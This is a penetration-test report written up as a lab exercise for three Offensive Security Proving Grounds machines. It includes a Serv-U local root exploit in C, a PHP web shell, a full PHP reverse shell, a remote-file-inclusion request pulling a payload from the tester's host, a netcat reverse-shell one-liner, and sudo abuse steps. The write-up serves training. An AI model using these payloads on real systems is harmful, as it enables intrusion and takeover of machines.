CTF-Writeups/PIF/Sample Report.md
2022-09-14 10:44:34 +05:00

24 KiB

title author date subject keywords subtitle lang titlepage titlepage-color titlepage-text-color titlepage-rule-color titlepage-rule-height book classoption code-block-font-size
Offensive Proving Grounds Play Test
ARZ
2022-09-13 Markdown
Markdown
Example
PGP Report en true FFD700 000000 000000 2 true oneside \scriptsize

Offensive Security Proving Grounds Play Test

Introduction

Offensive Security Proving Grounds Play penetration test report contains all efforts that were conducted in order to pass the OSCP exam. This report should contain all lab data in the report template format as well as all items that were used to pass the overall exam. This report will be graded from a standpoint of correctness and fullness to all aspects of the test. The purpose of this report is to ensure that the candidate has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the OSCP exam.

Objective

The objective of this assessment is to perform an internal penetration test against the Offensive Security Lab network. The student is tasked with following methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report.

Requirements

The candidate will be required to fill out this penetration testing report fully and to include the following sections:

  • Overall High-Level Summary and Recommendations (non-technical)
  • Methodology walkthrough and detailed outline of steps taken
  • Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable.
  • Any additional items that were not included

High-Level Summary

I was tasked with performing an internal penetration test towards Offensive Security Labs. An internal penetration test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Security's internal lab systems. My overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.

When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Security's network. When performing the attacks, I was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the testing, I had administrative level access to multiple systems. All systems were successfully exploited and access granted. These systems as well as a brief description on how access was obtained are listed below:

  • Election - Got access through leaked credentials and logging through SSH
  • Loly - Got access through weak credenitals and unrestricted file upload
  • SoSimple - Got access through unauthenticated remote code execution

Recommendations

I recommend patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.

Methodologies

I utilized a widely adopted approach to performing penetration testing that is effective in testing how well the Offensive Security Lab environments are secure. Below is a breakout of how I was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.

Information Gathering

The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, I was tasked with exploiting the lab and exam network. The specific IP addresses were:

Lab Network

192.168.123.211, 192.168.53.121, 192.168.123.78

Service Enumeration

The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems.

This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test. In some cases, some ports may not be listed.

Server IP Address Ports Open
192.168.123.211 TCP: 22,80
192.168.53.121 TCP: 80
192.168.123.78 TCP: 22,80

Penetration

The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems. During this penetration test, I was able to successfully gain access to 3 out of the 3 systems.

Vulnerability Exploited: Leaked Credentials

System Vulnerable: 192.168.123.211

Vulnerability Explanation:

Credentials were found from /eletcion/admin/logs hainvg system.log which were usable on SSH for love user

Privilege Escalation Vulnerability Explanation: A privilege escalation vulnerability exists in SolarWinds Serv-U before 15.1.7 for Linux, The Serv-U executable is setuid root, and uses ARGV[0] in a call to system(), without validation, when invoked with the -prepareinstallationE flag, resulting in command execution with root privilege.

Vulnerability Fix:

  • Remove the log file from /election/admin/logs, whitelist access to logs directory also update the password for love user.

  • A patch has been issued by solarwinds to upgrade to Serv-U 15.1.7.

Severity: Critical

Proof of Concept :

Steps to Exploit System

Enumeration

Starting off with an nmap scan

Nmap scan report for 192.168.123.211
Host is up (0.15s latency).
Not shown: 805 closed tcp ports (reset), 193 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
|   256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA)
|_  256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see two ports, ssh and http, ssh wasn't vulnerable so moving onto the web server

It was showing apache2 default web page which led to fuzzing for files and directories using gobuster

gobuster dir -u 'http://192.168.123.211/' -w /usr/share/wordlists/dirb/common.txt

This found some interesting stuff like, phpinfo.php, robots.txt and phpmyadmin, I tried accessing phpmyadmin with default credentials but got access denied

The phpinfo page didn't show much other than the version which wasn't exploitable

And lastly robots.txt showed some directory names

Out of which election directory existed which brought us to an application

Fuzzing on this page revealed /admin

Which showed an admin login panel, there I tried default credentials and performed basic sql injection payload but it didn't worked

I started fuzzing on /admin and found /logs

This directory had a file named system.log

Which had credentials love:P@$$w0rd@123

Foothold

Using these credentials on SSH gave us access to the machine

On further enumeration of the machine, there's a card.php in /var/www/html which has text in binary form which we can convert it to ASCII

But these credentials only work on the election admin panel which isn't useful now as we already have access on the machine

Gaining Root Access

Looking for SUID binaries we do find one unusual binary named Serv-U by using this command

find / -perm /4000 2>/dev/null

Serv-U is an FTP server, Luckliy this was exploitable as there was a CVE for this CVE-2019-12181

Using the poc from exploit-db we can compile this c code on the target machine

#include <stdio.h>
#include <unistd.h>
#include <errno.h>

int main()
{       
    char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
    int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
    // if execv is successful, we won't reach here
    printf("ret val: %d errno: %d\n", ret_val, errno);
    return errno;
}

Compile it with gcc

gcc -o test ./test.c

And after compiling it into a binary, simply just execute after making it an executable with chmod +x, We'll get a root shell

Vulnerability Exploited: Weak Credentials and Adrotate 5.8.24 - Unrestricted File Upload

System Vulnerable: 192.168.53.121

Vulnerability Explanation:

Brute forcing against loly user was possible which granted access to wordpress administrator dashboard, also adroate version 5.8.24 was vulnerable to unrestricted file upload which allowed uploading php file in zip archive to get command execution in the context of www-data user.

Privilege Escalation Vulnerability Explanation:

Packet Filter (BPF) implementation in the Linux kernel 4.4 improperly performed sign extension in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.

Vulnerability Fix:

  • Use strong password for loly user

  • Update the adrotate plugin to version 5.8.26

  • Update linux kernel to the latest version

Severity: Critical

Proof of Concept Code:

Steps to Exploit System

Enumeration

Starting with an namp scan, we see only one service running which is http

Nmap scan report for 192.168.53.121
Host is up (0.35s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.10.3 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.10.3 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The web page only shows a default installation page

So this leads us to fuzzing for files and directories with gobuster

gobuster dir -u 'http://192.168.53.121/' -w /usr/share/wordlists/dirb/common.txt 

This finds /wordpress , on visiting this directory it will load the wordpress site, Now the css doesn't look like it's working here and the reason for that is, if we check the source, css files are being fetched from loly.lc

We can add this domain in /etc/hosts file

On loading the page we'll get the proper wordpress page

To enumerate wordpress, we can use wp-scan to enumerate users and plugins

wpscan --url 'http://192.168.53.121/wordpress/' -eu 

This finds loly user which we can try to brute force this user's password

Now Scanning for plugins

This didn't showed any plugins being used, so this leaves us to brute forcing the password for loly as the last resort

wpscan --url 'http://192.168.53.121/wordpress/' -U 'loly' -P /usr/share/wordlists/rockyou.txt

| This brute forces the password fernando which we can use to login into the dashboard

After logging in we are presented with an admin dashboard as loly has the role of a wordpress administrator

Foothold

From here uploading a theme, plugin or editing a template wasn't available to us from which we can upload a reverse shell but the plugin adroate had an option to upload an advert but php files aren't allowed

But it does say that it extracts the file from zip, so what if we upload a zip file having a php file also the uploaded files will go to /wordpress/wp-content/banners

we have our php file

<?php system($_GET['cmd']); ?>

Now to upload this zip file

After uploading it, we'll visit the link http://loly.lc/wordpress/wp-content/banners/file.php?cmd=id

We have remote code execution, only thing now left is to get a reverse shell but I had trouble getting the one liners to work to for bash, php and nc for reverse shell so instead I used pentest monkey php reverse shell

set_time_limit (0);
$VERSION = "1.0";
$ip = 'IP';
$port = 2222;     
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
	
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?>

This gives us a reverse shell as www-data

Privilege Escalation

After stabilizing our shell we can start enumerating the machine for escalating our privileges to a user and for that we can find config.php from /var/www/html/wordpress which has the credentials to mysql database

We can try re using this password for loly user on the machine which works

Gaining Root Access

Through sudo -l I tried to see if there's any binary which this user can run with root privileges but it seems that this user isn't in sudoers group

hecking the kernel version with uname -avr it's running a very old kernel version 4.4.0-31 which may be vulnerable

Searching for an exploit on exploit-db

It shows that it has been tested on the exact kernel version so chances are we can get a root shell through this, on compiling and executing the binary we'll get a root shell

Vulnerability Exploited: Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)

System Vulnerable: 192.168.123.78

Vulnerability Explanation:

Social Warfare is a wordpress plugin, which the version < = 3.5.2 is vulnerable to Unauthenticated Remote Code Execution (RCE) by including the php code through Remote File Inclusion (RFI) in swp_url GET parameter.

Privilege Escalation Vulnerability Explanation: Service binary is reponsible for running a init script or running a service job buf if it can be misued as well by spawning a bash shell Steven user can run health.sh as a root user which can read to executing commands and can give root privileges

Vulnerability Fix:

  • Update the Social Warfare plugin to version 3.5.3 or later through the administrative dashboard.

  • Remove sudoers entry for max user which can lead to escalating to higher privileges.

  • Remove sudoers entry for steven user from executing health.sh also remove access from /opt directory for this user.

Severity: Critical

Proof of Concept Code:

Steps to Exploit System

Enumeration

Running nmap scan, we see three services running, ssh, dns and http

Nmap scan report for 192.168.123.78
Host is up (0.14s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 5b:55:43:ef:af:d0:3d:0e:63:20:7a:f4:ac:41:6a:45 (RSA)
|   256 53:f5:23:1b:e9:aa:8f:41:e2:18:c6:05:50:07:d8:d4 (ECDSA)
|_  256 55:b7:7b:7e:0b:f5:4d:1b:df:c3:5d:a1:d7:68:a9:6b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: So Simple
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The web servers shows only an image on the web page and nothing else

Fuzzing for files and directories with gobuster reveals wordpress directory

gobuster dir -u 'http://192.168.123.78'

We can start enumerating wordpress through wp-scan to scan for plugins and usernames

wpscan --url 'http://192.168.123.78/wordpress/' -eu

This finds two users admin and max

![](https://i.imgur.com/nlDpXCx.png()

On enumerating plugins it finds two of them as well

wpscan --url 'http://192.168.123.78/wordpress/' -ep  

Social warfare and Simple-cart-solution

Foothold

We can search for exploits related to these plugins out of which Social Warfare was vulnerable to unauthenticated remote code execution

Following the proof of concept, we need to host the payload which will have any command, here I'll show the output of id command and through RFI on swap_url, it will accept that file as input and will execute it through system function

The payload file have this content

<pre>system('id')</pre>

Hosting it through "python3 -m http.server 3333", making a request to this url with our payload file

http://192.168.123.78/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.49.123:3333/payload.txt

We get a request on our python server and on the web page we'll get the ouput of id command

Now that we have confirmed there's RCE we can get a reverse shell and for that we'll use netcat busybox one-liner as by default busybox version of netcat is available

<pre>system('rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.123 2222 >/tmp/f')</pre>

Stabilizing the shell with python3 so that we can get make our reverse shell better with the arrow key and tab completion functionality

Privilege Escalation

We can access max's directory which had .ssh hiden directory having the private key

![]https://i.imgur.com/HVRCnR6.png)

We can transfer that onto our local machine and use it through SSH to login but before that we want to change the permissions of that file to read and write only by our current user with chmod 600

Doing sudo -l will show that max can run service with steven user, we can check the abuse from GTFOBINS to escalate our privileges

sudo -u steven /usr/sbin/service ../../bin/bash

Gaining Root Access

Doing sudo -l again with steven will show that we can run /opt/tools/server-health.sh as a root user

!{](https://i.imgur.com/9kkB5kD.png)

But this file doesn't exist on checking with ls

![](https://i.imgur.com/4YUgXNY.png()

If we check the permissions on /opt directory, steven is the owner of this directory which means we can create this file and execute whatever we want as a root user, so here I just added bash command which will spawn bash shell as root on executing the file

Now just execute this script with sudo and we'll get the root shell

sudo /opt/tools/server-health.sh

Maintaining Access

Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable. The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again. Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.

I added administrator and root level accounts on all systems compromised. In addition to the administrative/root access, a Metasploit meterpreter service was installed on the machine to ensure that additional access could be established.

House Cleaning

The house cleaning portions of the assessment ensures that remnants of the penetration test are removed. Often fragments of tools or user accounts are left on an organizations computer which can cause security issues down the road. Ensuring that we are meticulous and no remnants of our penetration test are left over is important.

After the trophies on the exam network were completed, I removed all user accounts and passwords as well as the meterpreter services installed on the system. Offensive Security should not have to remove any user accounts or services from the system.